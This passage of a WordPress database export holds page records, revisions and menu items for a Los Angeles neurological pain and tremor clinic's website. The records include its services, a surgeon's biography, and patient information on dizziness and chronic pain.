this:\n\n<blockquote>Hi there! I\'m a bike messenger by day, aspiring actor by night, and this is my blog. I live in Los Angeles, have a great dog named Jack, and I like piña coladas. (And gettin\' caught in the rain.)</blockquote>\n\n...or something like this:\n\n<blockquote>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</blockquote>\n\nAs a new WordPress user, you should go to <a href=\"http://0002df5.rcomhost.com//Neuro/wp-admin/\">your dashboard</a> to delete this page and create new pages for your content. Have fun!','Sample Page','','publish','closed','open','','sample-page','','','2014-06-15 04:07:06','2014-06-15 04:07:06','',0,'http://0002df5.rcomhost.com//Neuro/?page_id=2',0,'page','',0),(5,1,'2014-06-15 03:59:41','0000-00-00 00:00:00','','Nice Favicon','','draft','closed','closed','','wpnt-nice_favicon','','','2014-06-15 03:59:41','0000-00-00 00:00:00','',0,'http://theworstpain.com/Neuro/?post_type=houdini&p=5',0,'houdini','',0),(6,1,'2014-06-15 03:59:41','0000-00-00 00:00:00','','Nice Logo','','draft','closed','closed','','wpnt-nice_logo','','','2014-06-15 03:59:41','0000-00-00 00:00:00','',0,'http://theworstpain.com/Neuro/?post_type=houdini&p=6',0,'houdini','',0),(7,1,'2014-06-15 03:59:41','0000-00-00 00:00:00','','Nice Logo Retina','','draft','closed','closed','','wpnt-nice_logo_retina','','','2014-06-15 03:59:41','0000-00-00 00:00:00','',0,'http://theworstpain.com/Neuro/?post_type=houdini&p=7',0,'houdini','',0),(8,1,'2014-06-15 03:59:41','0000-00-00 00:00:00','','Nice Header Background Image','','draft','closed','closed','','wpnt-nice_header_background_image','','','2014-06-15 03:59:41','0000-00-00 00:00:00','',0,'http://theworstpain.com/Neuro/?post_type=houdini&p=8',0,'houdini','',0),(9,1,'2014-06-15 04:01:06','2014-06-15 04:01:06','<h2><a title=\"Pain\" href=\"http://theworstpain.com/Neuro/pain/\"><img class=\"aligncenter size-full wp-image-92\" src=\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/Neuro-main-pic.jpg\" alt=\"Neuro main pic\" width=\"949\" height=\"405\" /></a></h2>\r\n<h3 style=\"color: #204788;\">About Us</h3>\r\n<p style=\"color: #424141;\"><span style=\"color: #000000;\">NEUROCENTER FOR PAIN AND TREMOR of Los Angeles, California, provides neurological and neurosurgical evaluations, diagnoses and treatments for chronic intractable pain and involuntary movement disorders. We specialize in innovative procedures and therapies to deal with difficult-to-treat chronic pain conditions.</span></p>\r\n<p style=\"color: #424141;\"><b><a title=\"Contact us & locations\" href=\"http://theworstpain.com/Neuro/contact-us-locations/\">Contact us</a> <span style=\"color: #808080;\">today in Los Angeles, California, to learn more about our neurological and neurosurgical evaluations, procedures, and other services.</span></b></p>\r\n\r\n<h3 style=\"color: #204788;\">Restore Your Health</h3>\r\n<span style=\"color: #000000;\">Our goal at the NEUROCENTER FOR PAIN AND TREMOR is to improve your total health and well-being,and restore you to full function. Our main objective is the prevention, evaluation, treatment, and rehabilitation of persons in pain.</span>\r\n<h3 style=\"color: #204788;\">Our Services</h3>\r\n<p style=\"color: #424141;\">Our Services Include:</p>\r\n\r\n<ul>\r\n <li>Neurological and Neurosurgical Evaluations</li>\r\n <li>Qualified Medical Examinations (QME)</li>\r\n <li>Agreed Medical Examinations (AME)</li>\r\n <li>Neurodiagnostic Procedures\r\n<ul>\r\n <li>Electroencephalography & EEG</li>\r\n <li>Electromyography (EMG)</li>\r\n <li>Nerve Conduction Velocity Testing (NCV)</li>\r\n <li>Electronystagmography (ENG)</li>\r\n <li>Neuropsychological testing</li>\r\n <li>Vestibular Testing for Balance and Dizziness</li>\r\n</ul>\r\n</li>\r\n <li>Neurological and Neurosurgical Treatment\r\n<ul>\r\n <li>Nerve blocks and other anesthesia pain relief procedures</li>\r\n <li>Implantable devices</li>\r\n</ul>\r\n</li>\r\n <li>Other Neurosurgical techniques</li>\r\n</ul>\r\n<h3 style=\"color: #204788;\"><a title=\"Chronic Pain\" href=\"http://theworstpain.com/Neuro/pain/\">Commonly treated disorders (Click here)</a></h3>\r\n<p style=\"color: #424141; text-align: center;\"><i>Proudly Serving All of Los Angeles</i></p>\r\n<p style=\"color: #424141; text-align: center;\"></p>','Neurological & Neurosurgical Evaluations','','publish','closed','closed','','neurological-neurosurgical-evaluations','','','2014-06-17 22:41:58','2014-06-17 22:41:58','',0,'http://theworstpain.com/Neuro/?page_id=9',0,'page','',0),(10,1,'2014-06-15 04:01:06','2014-06-15 04:01:06','<h2><img class=\"aligncenter size-full wp-image-92\" src=\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/Neuro-main-pic.jpg\" alt=\"Neuro main pic\" width=\"949\" height=\"405\" /></h2>\r\n<h3 style=\"color: #204788;\">About Us</h3>\r\n<p style=\"color: #424141;\">NEUROCENTER FOR PAIN AND TREMOR of Los Angeles, California, provides neurological and neurosurgical evaluations, diagnoses and treatments for chronic intractable pain and involuntary movement disorders. We specialize in innovative procedures and therapies to deal with difficult-to-treat chronic pain conditions.</p>\r\n<p style=\"color: #424141;\"><b><a style=\"color: #204788;\" title=\"Contact us & locations\" href=\"http://www.fymdesignsco.com/neuro/contact-us-locations/\">Contact</a> us today in Los Angeles, California, to learn more about our neurological and neurosurgical evaluations, procedures, and other services.</b></p>\r\n\r\n<h3 style=\"color: #204788;\">Restore Your Health</h3>\r\nOur goal at the NEUROCENTER FOR PAIN AND TREMOR is to improve your total health and well-being,and restore you to full function. Our main objective is the prevention, evaluation, treatment, and rehabilitation of persons in pain.\r\n<h3 style=\"color: #204788;\">Our Services</h3>\r\n<p style=\"color: #424141;\">Our Services Include:\r\n<strong>• Neurological and Neurosurgical Evaluations\r\n• Qualified Medical Examinations (QME)\r\n• Agreed Medical Examinations (AME)\r\n• Neurodiagnostic Procedures:\r\n</strong>• Electroencephalogrpahy & EEG)\r\n• Electromyography (EMG)\r\n• Nerve Conduction Velocity Testing (NCV)\r\n• Electronystagmogram (ENG)\r\n• Neuropsychological testing\r\n• Vestibular Testing for Balance and Dizziness <strong>\r\n• Neurological and Neurosurgical Treatment:\r\n</strong>• Nerve blocks and other anesthesia pain relief procedures\r\n• Implantable devices<strong>\r\n• Other Neurosurgical techniques</strong></p>\r\n<p style=\"color: #424141; text-align: center;\"><i>Proudly Serving All of Los Angeles</i></p>','Neurological & Neurosurgical Evaluations','','inherit','open','open','','9-revision-v1','','','2014-06-15 04:01:06','2014-06-15 04:01:06','',9,'http://theworstpain.com/Neuro/2014/06/15/9-revision-v1/',0,'revision','',0),(11,1,'2014-06-15 04:02:35','2014-06-15 04:02:35','<span style=\"color: #424141;\"><img class=\"alignleft size-full wp-image-55\" src=\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/74649097_scaled_258x211.jpg\" alt=\"74649097_scaled_258x211\" width=\"258\" height=\"211\" />Dr. Jacob Chodakiewitz, M.D., is a Stereotactic Neurosurgeon with a specialty in the field of Functional Neurosurgery. He has 28 years of experience performing stereotactic, neurosurgical procedures for the control of chronic intractable pain and tremor. Dr. Chodakiewitz collaborated closely with the late Professor D. Albe-Fessard of Paris, pioneer of microelectrode brain mapping in the thalamus, in the clinical applications of functional and stereotactic surgical techniques for the control of tremor and pain. He was director of the Functional Neurosurgical unit of the Department of Neurosurgery at UCI from 1992 to 1994.</span>\r\n\r\n<span style=\"color: #424141;\">Dr. Chodakiewitz was principal research investigator in the FDA studies of Deep Brain Stimulation (DBS) for tremor and chronic pain, and his work was instrumental in helping gain FDA approval of Deep Brain Stimulation for Parkinson\'s in August 1997.</span>\r\n\r\n<span style=\"color: #424141;\">Dr. Chodakiewitz serves as the Functional Stereotactic consultant for the department of Neurosurgery at the Southern California Kaiser Permanente Hospitals. Dr. Chodakiewitz is the Neurosurgical Director and Pain Consultant for various international victims of terror organizations, and he is a qualified medical examiner for the state of California Workers Compensation Board.</span>\r\n\r\n<span style=\"color: #424141;\">Dr. Chodakiewitz has 28 years of treating chronic pain and has been a leading pioneer in the field. He has expertise in both the neurological and neurosurgical treatment of chronic pain, which makes it possible to treat pain through a combination of modalities.</span>\r\n\r\n<span style=\"color: #424141;\">Dr. Chodakiewitz has been a pioneer in the field of deep brain stimulation in both chronic pain and Parkinsons treatment. He sits on the Board of the Save a Brain Foundation, and is a member of the Brain Research Institute (BRI) at UCLA. He also previously served in the California Geriatric Curriculum Advisory Panel on pain issues for the elderly.</span>','Dr. Chodakiewitz','','publish','closed','open','','dr-jacob-chodakiewitz','','','2016-02-10 02:38:49','2016-02-10 02:38:49','',0,'http://theworstpain.com/Neuro/?page_id=11',0,'page','',0),(12,1,'2014-06-15 04:02:35','2014-06-15 04:02:35','<span style=\"color: #424141;\"><img class=\"alignleft size-full wp-image-55\" src=\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/74649097_scaled_258x211.jpg\" alt=\"74649097_scaled_258x211\" width=\"258\" height=\"211\" />Jacob Chodakiewitz, M.D., is a Stereotactic Neurosurgeon with a specialty in the field of Functional Neurosurgery. He has 28 years of experience performing stereotactic, neurosurgical procedures for the control of chronic intractable pain and tremor. Dr. Chodakiewitz collaborated closely with the late Professor D. Albe-Fessard of Paris, pioneer of microelectrode brain mapping in the thalamus, in the clinical applications of functional and stereotactic surgical techniques for the control of tremor and pain. He was director of the Functional Neurosurgical unit of the Department of Neurosurgery at UCI from 1992 to 1994.</span>\r\n\r\n<span style=\"color: #424141;\">Dr. Chodakiewitz was principal research investigator in the FDA studies of Deep Brain Stimulation (DBS) for tremor and chronic pain, and his work was instrumental in helping gain FDA approval of Deep Brain Stimulation for Parkinson\'s in August 1997.</span>\r\n\r\n<span style=\"color: #424141;\">Dr. Chodakiewitz serves as the Functional Stereotactic consultant for the department of Neurosurgery at the Southern California Kaiser Permanente Hospitals. Dr. Chodakiewitz is the Neurosurgical Director and Pain Consultant for various international victims of terror organizations, and he is a qualified medical examiner for the state of California Workers Compensation Board.</span>\r\n\r\n<span style=\"color: #424141;\">Dr. Chodakiewitz has 28 years of treating chronic pain and has been a leading pioneer in the field. He has expertise in both the neurological and neurosurgical treatment of chronic pain, which makes it possible to treat pain through a combination of modalities.</span>\r\n\r\n<span style=\"color: #424141;\">Dr. Chodakiewitz has been a pioneer in the field of deep brain stimulation in both chronic pain and Parkinsons treatment. He sits on the Board of the Save a Brain Foundation, and is a member of the Brain Research Institute (BRI) at UCLA. He also previously served in the California Geriatric Curriculum Advisory Panel on pain issues for the elderly.</span>','Dr. Chodakiewitz','','inherit','open','open','','11-revision-v1','','','2014-06-15 04:02:35','2014-06-15 04:02:35','',11,'http://theworstpain.com/Neuro/2014/06/15/11-revision-v1/',0,'revision','',0),(13,1,'2014-06-15 04:03:22','2014-06-15 04:03:22','','Contact us & locations','','publish','closed','open','','contact-us-locations','','','2014-06-15 04:07:06','2014-06-15 04:07:06','',0,'http://theworstpain.com/Neuro/?page_id=13',0,'page','',0),(14,1,'2014-06-15 04:03:22','2014-06-15 04:03:22','','Contact us & locations','','inherit','open','open','','13-revision-v1','','','2014-06-15 04:03:22','2014-06-15 04:03:22','',13,'http://theworstpain.com/Neuro/2014/06/15/13-revision-v1/',0,'revision','',0),(15,1,'2014-06-15 04:03:44','2014-06-15 04:03:44','<h2 style=\"color: #204788;\"><img class=\"alignright size-full wp-image-86\" src=\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/74649008_scaled_186x259.jpg\" alt=\"74649008_scaled_186x259\" width=\"186\" height=\"259\" />What is dizziness?</h2>\r\n<p style=\"color: #000000;\"><span style=\"color: #333333;\">Dizziness may be a fleeting sensation or the prolonged and intense symptom of a wide range of health problems that can affect a person\'s independence, ability to work, and quality of life. Experts believe that more than 40% of Americans will experience dizziness that is serious enough to go to a doctor. Even dizziness that seems minor, if undiagnosed, may be a signal of underlying disorders.</span></p>\r\n<p style=\"color: #000000;\"><span style=\"color: #333333;\">Balance disorders may also lead to other problems including fatigue, difficulty walking, or disinterest in everyday and leisure activities. If you or your child, parent, friend, or co-worker has a balance problem — take it seriously.</span></p>\r\n\r\n<h2 style=\"color: #204788;\">What Are the Symptoms of a Balance Disorder?</h2>\r\n<span style=\"color: #333333;\">When balance is impaired, an individual has difficulty maintaining orientation. For example, an individual may experience the room spinning and may not be able to walk without staggering or may not even be able to arise.</span>\r\n<h2 style=\"color: #204788;\">Dizziness Symptoms</h2>\r\n<ul>\r\n <li><span style=\"color: #333333;\">Sensation of Dizziness or Vertigo (Spinning)</span></li>\r\n <li><span style=\"color: #333333;\">Falling or a Feeling of Falling</span></li>\r\n <li><span style=\"color: #333333;\">Lightheadedness or Feeling Woozy</span></li>\r\n <li><span style=\"color: #333333;\">Visual Blurring</span></li>\r\n <li><span style=\"color: #333333;\">Disorientation</span></li>\r\n</ul>\r\n<span style=\"color: #333333;\">Some individuals may also experience nausea, vomiting, diarrhea, faintness, changes in heart rate and blood pressure, fear, anxiety, or panic. Reactions to these symptoms include fatigue, depression, and decreased concentration. The symptoms may appear and disappear over short time periods or last for longer periods of time.</span>\r\n<h2 style=\"color: #204788;\">How Are Balance Disorders Diagnosed?</h2>\r\n<p style=\"color: #000000;\"><span style=\"color: #333333;\">The physician may require tests to assess the cause and extent of the disruption of balance. The kinds of tests needed will vary based on the patient\'s symptoms and health status. Because there are so many variables, not all patients require every test.</span></p>\r\n<p style=\"color: #000000;\"><span style=\"color: #333333;\">Some examples of diagnostic tests include a hearing examination, blood tests, an electronystagmogram (ENG — a test of the vestibular system), or imaging studies of the head and brain.</span></p>\r\n<p style=\"color: #000000;\"><span style=\"color: #333333;\">The caloric test may be performed as part of the ENG. In this test, each ear is flushed with warm and then cool water, usually one ear at a time; the amount of nystagmus resulting is measured. Weak nystagmus or the absence of nystagmus may indicate an inner ear disorder.</span></p>\r\n<p style=\"color: #000000;\"><span style=\"color: #333333;\">Another test of the vestibular system, posturography, requires the individual to stand on a special platform capable of movement within a controlled visual environment; body sway is recorded in response to movement of the platform and/or the visual environment.</span></p>\r\n<p style=\"color: #000000;\"><strong><a style=\"color: #204788;\" href=\"http://www.neurocenterpain.com/neurosurgical-evaluations-location-contact-los-angeles-ca.html\" target=\"_self\">Contact</a> us today in Los Angeles, California, to schedule an appointment or to learn more about our <a style=\"color: #204788;\" href=\"http://www.neurocenterpain.com/\" target=\"_self\">neurological evaluations</a>.</strong></p>','Dizziness','','publish','closed','open','','dizziness','','','2014-06-17 22:35:19','2014-06-17 22:35:19','',0,'http://theworstpain.com/Neuro/?page_id=15',0,'page','',0),(16,1,'2014-06-15 04:03:44','2014-06-15 04:03:44','<h2 style=\"color: #204788;\"><img class=\"alignright size-full wp-image-86\" src=\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/74649008_scaled_186x259.jpg\" alt=\"74649008_scaled_186x259\" width=\"186\" height=\"259\" />What is dizziness?</h2>\r\n<p style=\"color: #000000;\">Dizziness may be a fleeting sensation or the prolonged and intense symptom of a wide range of health problems that can affect a person\'s independence, ability to work, and quality of life. Experts believe that more than 40% of Americans will experience dizziness that is serious enough to go to a doctor. Even dizziness that seems minor, if undiagnosed, may be a signal of underlying disorders.</p>\r\n<p style=\"color: #000000;\">Balance disorders may also lead to other problems including fatigue, difficulty walking, or disinterest in everyday and leisure activities. If you or your child, parent, friend, or co-worker has a balance problem — take it seriously.</p>\r\n\r\n<h2 style=\"color: #204788;\">What Are the Symptoms of a Balance Disorder?</h2>\r\nWhen balance is impaired, an individual has difficulty maintaining orientation. For example, an individual may experience the room spinning and may not be able to walk without staggering or may not even be able to arise.\r\n<h2 style=\"color: #204788;\">Dizziness Symptoms</h2>\r\n<ul>\r\n <li>Sensation of Dizziness or Vertigo (Spinning)</li>\r\n <li>Falling or a Feeling of Falling</li>\r\n <li>Lightheadedness or Feeling Woozy</li>\r\n <li>Visual Blurring</li>\r\n <li>Disorientation</li>\r\n</ul>\r\n<span style=\"color: #000000;\">Some individuals may also experience nausea, vomiting, diarrhea, faintness, changes in heart rate and blood pressure, fear, anxiety, or panic. Reactions to these symptoms include fatigue, depression, and decreased concentration. The symptoms may appear and disappear over short time periods or last for longer periods of time.</span>\r\n<h2 style=\"color: #204788;\">How Are Balance Disorders Diagnosed?</h2>\r\n<p style=\"color: #000000;\">The physician may require tests to assess the cause and extent of the disruption of balance. The kinds of tests needed will vary based on the patient\'s symptoms and health status. Because there are so many variables, not all patients require every test.</p>\r\n<p style=\"color: #000000;\">Some examples of diagnostic tests include a hearing examination, blood tests, an electronystagmogram (ENG — a test of the vestibular system), or imaging studies of the head and brain.</p>\r\n<p style=\"color: #000000;\">The caloric test may be performed as part of the ENG. In this test, each ear is flushed with warm and then cool water, usually one ear at a time; the amount of nystagmus resulting is measured. Weak nystagmus or the absence of nystagmus may indicate an inner ear disorder.</p>\r\n<p style=\"color: #000000;\">Another test of the vestibular system, posturography, requires the individual to stand on a special platform capable of movement within a controlled visual environment; body sway is recorded in response to movement of the platform and/or the visual environment.</p>\r\n<p style=\"color: #000000;\"><strong><a style=\"color: #204788;\" href=\"http://www.neurocenterpain.com/neurosurgical-evaluations-location-contact-los-angeles-ca.html\" target=\"_self\">Contact</a> us today in Los Angeles, California, to schedule an appointment or to learn more about our <a style=\"color: #204788;\" href=\"http://www.neurocenterpain.com/\" target=\"_self\">neurological evaluations</a>.</strong></p>','Dizziness','','inherit','open','open','','15-revision-v1','','','2014-06-15 04:03:44','2014-06-15 04:03:44','',15,'http://theworstpain.com/Neuro/2014/06/15/15-revision-v1/',0,'revision','',0),(17,1,'2014-06-15 04:04:12','2014-06-15 04:04:12','<h2 style=\"color: #204788; text-align: left;\"><img class=\"alignleft size-full wp-image-80\" src=\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/74648877_scaled_166x238-1.jpg\" alt=\"74648877_scaled_166x238-1\" width=\"166\" height=\"238\" />What Is Pain?</h2>\r\n<p style=\"color: #424141; text-align: left;\">Pain is a natural response that acts as a warning to indicate harm or potential danger to tissues in our bodies.</p>\r\n<p style=\"color: #424141; text-align: left;\">When pain persists for more than six months and is not adequately relieved by standard medical treatments, it is said to be chronic or intractable. Such pain no longer serves a useful purpose for the body and instead makes normal living almost impossible, with depression as a common side effect. Depression often accompanies the pain and can become as disabling and demoralizing as the pain itself.</p>\r\n\r\n<h2 style=\"color: #204788; text-align: left;\">What Causes Chronic Pain?</h2>\r\n<p style=\"color: #424141; text-align: left;\">Chronic pain may result from an initial traumatic event that has long since healed. It may be related to nerve damage, and it may have an ongoing cause such as arthritis, cancer, infection, or any number of other ailments, including Parkinson’s Disease.</p>\r\n\r\n<h2 style=\"color: #204788; text-align: left;\">How Is Chronic Pain Treated?</h2>\r\n<p style=\"text-align: left;\">Treatment begins with systemic, nonsurgical techniques including pain medication, physical therapy, and pain management therapy. Most patients will respond to a combination of physical therapy, oral medication, and other conservative therapies. Some patients require surgery to treat the underlying mechanical condition that causes the pain, and others require more advanced surgical interventions to treat their chronic pain.</p>\r\n[full] [third flow=\"start\"]\r\n<h2 style=\"color: #204788; text-align: left;\">Chronic Pain Procedures</h2>\r\n<ul>\r\n <li>Implantable Infusion Pumps</li>\r\n <li>Spinal Cord Stimulation</li>\r\n <li>Peripheral Nerve Stimulation</li>\r\n</ul>\r\n[/third] [third flow=\"hold\"]\r\n<h2 style=\"color: #204788; text-align: left;\">Stereotactic and Functional Neurosurgery</h2>\r\n<ul>\r\n <li>Deep Brain Stimulation</li>\r\n <li>Additional procedures</li>\r\n</ul>\r\n[/third] [third flow=\"end\"]\r\n<h2 style=\"color: #204788; text-align: left;\">Commonly Treated Disorders</h2>\r\n<ul>\r\n <li><span style=\"color: #000000;\">Low Back Pain</span></li>\r\n <li><span style=\"color: #000000;\">Facial Pain (Neuralgia)</span></li>\r\n <li><span style=\"color: #000000;\">Burning Pain as in RSD</span></li>\r\n <li><span style=\"color: #000000;\">Herpetic Neuralgia (Shingles)</span></li>\r\n <li><span style=\"color: #000000;\">Cancer Pains</span></li>\r\n <li><span style=\"color: #000000;\">Head Pains</span></li>\r\n <li><span style=\"color: #000000;\">Post-Surgical Spine Pain</span></li>\r\n <li><span style=\"color: #000000;\">Extremity Pains</span></li>\r\n <li><span style=\"color: #000000;\">Phantom Pain Post-Amputation</span></li>\r\n <li><span style=\"color: #000000;\">Pain after Stroke</span></li>\r\n <li><span style=\"color: #000000;\">Pain after Nerve Injury</span></li>\r\n <li><span style=\"color: #000000;\">Diabetic & Other Neuropathies</span></li>\r\n <li><span style=\"color: #000000;\">Pain from Multiple Sclerosis</span></li>\r\n <li><span style=\"color: #000000;\">Painful Paralysis</span></li>\r\n <li><span style=\"color: #000000;\">Painful Numbness</span></li>\r\n <li><span style=\"color: #000000;\">Parkinson\'s Tremors</span></li>\r\n <li><span style=\"color: #000000;\">Involuntary Movement Disorders</span></li>\r\n <li><span style=\"color: #000000;\">Rare Conditions</span></li>\r\n <li><span style=\"color: #000000;\">Back Pain</span></li>\r\n <li><span style=\"color: #000000;\">Spin Problems</span></li>\r\n <li><span style=\"color: #000000;\">Dizziness</span></li>\r\n <li><span style=\"color: #000000;\">Balance Disorders</span></li>\r\n <li><span style=\"color: #000000;\">Headaches</span></li>\r\n</ul>\r\n[/third] [/full]','Chronic Pain','','publish','closed','open','','pain','','','2014-06-17 22:16:00','2014-06-17 22:16:00','',0,'http://theworstpain.com/Neuro/?page_id=17',0,'page','',0),(18,1,'2014-06-15 04:04:12','2014-06-15 04:04:12','<h2 style=\"color: #204788; text-align: left;\"><img class=\"alignleft size-full wp-image-80\" src=\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/74648877_scaled_166x238-1.jpg\" alt=\"74648877_scaled_166x238-1\" width=\"166\" height=\"238\" />What Is Pain?</h2>\r\n<p style=\"color: #424141; text-align: left;\">Pain is a natural response that acts as a warning to indicate harm or potential danger to tissues in our bodies.</p>\r\n<p style=\"color: #424141; text-align: left;\">When pain persists for more than six months and is not adequately relieved by standard medical treatments, it is said to be chronic or intractable. Such pain no longer serves a useful purpose for the body and instead makes normal living almost impossible, with depression as a common side effect. Depression often accompanies the pain and can become as disabling and demoralizing as the pain itself.</p>\r\n\r\n<h2 style=\"color: #204788; text-align: left;\">What Causes Chronic Pain?</h2>\r\n<p style=\"color: #424141; text-align: left;\">Chronic pain may result from an initial traumatic event that has long since healed. It may be related to nerve damage, and it may have an ongoing cause such as arthritis, cancer, infection, or any number of other ailments, including Parkinson’s Disease.</p>\r\n\r\n<h2 style=\"color: #204788; text-align: left;\">How Is Chronic Pain Treated?</h2>\r\n<p style=\"text-align: left;\">Treatment begins with systemic, nonsurgical techniques including pain medication, physical therapy, and pain management therapy. Most patients will respond to a combination of physical therapy, oral medication, and other conservative therapies. Some patients require surgery to treat the underlying mechanical condition that causes the pain, and others require more advanced surgical interventions to treat their chronic pain.</p>\r\n[full] [third flow=\"start\"]\r\n<h2 style=\"color: #204788; text-align: left;\">Chronic Pain Procedures</h2>\r\n<ul>\r\n <li>Implantable Infusion Pumps</li>\r\n <li>Spinal Cord Stimulation</li>\r\n <li>Peripheral Nerve Stimulation</li>\r\n</ul>\r\n[/third] [third flow=\"hold\"]\r\n<h2 style=\"color: #204788; text-align: left;\">Stereotactic and Functional Neurosurgery</h2>\r\n<ul>\r\n <li>Deep Brain Stimulation</li>\r\n <li>Additional procedures</li>\r\n</ul>\r\n[/third] [third flow=\"end\"]\r\n<h2 style=\"color: #204788; text-align: left;\">Commonly Treated Disorders</h2>\r\n<ul>\r\n <li><span style=\"color: #000000;\">Low Back Pain</span></li>\r\n <li><span style=\"color: #000000;\">Facial Pain (Neuralgia)</span></li>\r\n <li><span style=\"color: #000000;\">Burning Pain as in RSD</span></li>\r\n <li><span style=\"color: #000000;\">Herpetic Neuralgia (Shingles)</span></li>\r\n <li><span style=\"color: #000000;\">Cancer Pains</span></li>\r\n <li><span style=\"color: #000000;\">Head Pains</span></li>\r\n <li><span style=\"color: #000000;\">Post-Surgical Spine Pain</span></li>\r\n <li><span style=\"color: #000000;\">Extremity Pains</span></li>\r\n <li><span style=\"color: #000000;\">Phantom Pain Post-Amputation</span></li>\r\n <li><span style=\"color: #000000;\">Pain after Stroke</span></li>\r\n <li><span style=\"color: #000000;\">Pain after Nerve Injury</span></li>\r\n <li><span style=\"color: #000000;\">Diabetic & Other Neuropathies</span></li>\r\n <li><span style=\"color: #000000;\">Pain from Multiple Sclerosis</span></li>\r\n <li><span style=\"color: #000000;\">Painful Paralysis</span></li>\r\n <li><span style=\"color: #000000;\">Painful Numbness</span></li>\r\n <li><span style=\"color: #000000;\">Parkinson\'s Tremors</span></li>\r\n <li><span style=\"color: #000000;\">Involuntary Movement Disorders</span></li>\r\n <li><span style=\"color: #000000;\">Rare Conditions</span></li>\r\n <li><span style=\"color: #000000;\">Back Pain</span></li>\r\n <li><span style=\"color: #000000;\">Spin Problems</span></li>\r\n <li><span style=\"color: #000000;\">Dizziness</span></li>\r\n <li><span style=\"color: #000000;\">Balance Disorders</span></li>\r\n <li><span style=\"color: #000000;\">Headaches</span></li>\r\n</ul>\r\n[/third] [/full]','Pain','','inherit','open','open','','17-revision-v1','','','2014-06-15 04:04:12','2014-06-15 04:04:12','',17,'http://theworstpain.com/Neuro/2014/06/15/17-revision-v1/',0,'revision','',0),(19,1,'2014-06-15 04:05:53','2014-06-15 04:05:53','','Chronic Pain','','publish','open','open','','chronic-pain','','','2014-06-17 22:13:58','2014-06-17 22:13:58','',0,'http://theworstpain.com/Neuro/?p=19',3,'nav_menu_item','',0),(20,1,'2014-06-15 04:05:53','2014-06-15 04:05:53',' ','','','publish','open','open','','20','','','2014-06-17 22:13:58','2014-06-17 22:13:58','',0,'http://theworstpain.com/Neuro/?p=20',4,'nav_menu_item','',0),(21,1,'2014-06-15 04:05:53','2014-06-15 04:05:53',' ','','','publish','open','open','','21','','','2014-06-17 22:13:58','2014-06-17 22:13:58','',0,'http://theworstpain.com/Neuro/?p=21',5,'nav_menu_item','',0),(22,1,'2014-06-15 04:05:53','2014-06-15 04:05:53',' ','','','publish','open','open','','22','','','2014-06-17 22:13:58','2014-06-17 22:13:58','',0,'http://theworstpain.com/Neuro/?p=22',2,'nav_menu_item','',0),(23,1,'2014-06-15 04:05:34','0000-00-00 00:00:00',' ','','','draft','open','open','','','','','2014-06-15 04:05:34','0000-00-00 00:00:00','',0,'http://theworstpain.com/Neuro/?p=23',1,'nav_menu_item','',0),(24,1,'2014-06-15 04:07:06','2014-06-15 04:07:06','This is an example page. It\'s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:\n\n<blockquote>Hi there! I\'m a bike messenger by day, aspiring actor by night, and this is my blog. I live in Los Angeles, have a great dog named Jack, and I like piña coladas. (And gettin\' caught in the rain.)</blockquote>\n\n...or something like this:\n\n<blockquote>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</blockquote>\n\nAs a new WordPress user, you should go to <a href=\"http://0002df5.rcomhost.com//Neuro/wp-admin/\">your dashboard</a> to delete this page and create new pages for your content. Have fun!','Sample Page','','inherit','open','open','','2-revision-v1','','','2014-06-15 04:07:06','2014-06-15 04:07:06','',2,'http://theworstpain.com/Neuro/2014/06/15/2-revision-v1/',0,'revision','',0),(25,1,'2014-06-17 22:10:03','2014-06-17 22:10:03','','Home','','publish','open','open','','home','','','2014-06-17 22:13:58','2014-06-17 22:13:58','',0,'http://theworstpain.com/Neuro/?p=25',1,'nav_menu_item','',0),(28,1,'2014-06-17 22:41:06','2014-06-17 22:41:06','<h2><a title=\"Pain\" href=\"http://theworstpain.com/Neuro/pain/\"><img class=\"aligncenter size-full wp-image-92\" src=\"http://www.fymdesignsco.com/neuro/wp-content/uploads/2014/05/Neuro-main-pic.jpg\" alt=\"Neuro main pic\" width=\"949\" height=\"405\" /></a></h2>\n<h3 style=\"color: #204788;\">About Us</h3>\n<p style=\"color: #424141;\"><span style=\"color: #000000;\">NEUROCENTER FOR PAIN AND TREMOR of Los Angeles, California, provides neurological and neurosurgical evaluations, diagnoses and treatments for chronic intractable pain and involuntary movement disorders. We specialize in innovative procedures and therapies to deal with difficult-to-treat chronic pain conditions.</span></p>\n<p style=\"color: #424141;\"><b><a title=\"Contact us & locations\" href=\"http://theworstpain.com/Neuro/contact-us-locations/\">Contact us</a> <span style=\"color: #808080;\">today in Los Angeles, California, to learn more about our neurological and neurosurgical evaluations, procedures, and other services.</span></b></p>\n\n<h3 style=\"color: #204788;\">Restore Your Health</h3>\n<span style=\"color: #000000;\">Our goal at the NEUROCENTER FOR PAIN AND TREMOR is to improve your total health and well-being,and restore you to full function. Our main objective is the prevention, evaluation, treatment, and rehabilitation of persons in pain.</span>\n<h3 style=\"color: #204788;\">Our Services</h3>\n<p style=\"color: #424141;\">Our Services Include:</p>\n\n<ul>\n <li>Neurological and Neurosurgical Evaluations</li>\n <li>Qualified Medical Examinations (QME)</li>\n <li>Agreed Medical Examinations (AME)</li>\n <li>Neurodiagnostic Procedures\n<ul>\n <li>Electroencephalography & EEG</li>\n <li>Electromyography (EMG)</li>\n <li>Nerve Conduction Velocity Testing (NCV)</li>\n <li>Electronystagmogram (ENG)</li>\n <li>Neuropsychological testing</li>\n <li>Vestibular Testing for Balance and Dizziness</li>\n</ul>\n</li>\n <li>Neurological and Neurosurgical Treatment\n<ul>\n <li>Nerve blocks and other anesthesia pain relief procedures</li>\n <li>Implantable devices</li>\n</ul>\n</li>\n <li>Other Neurosurgical techniques</li>\n</ul>\n<h3 style=\"color: #204788;\"><a title=\"Chronic Pain\" href=\"http://theworstpain.com/Neuro/pain/\">Commonly treated disorders (Click 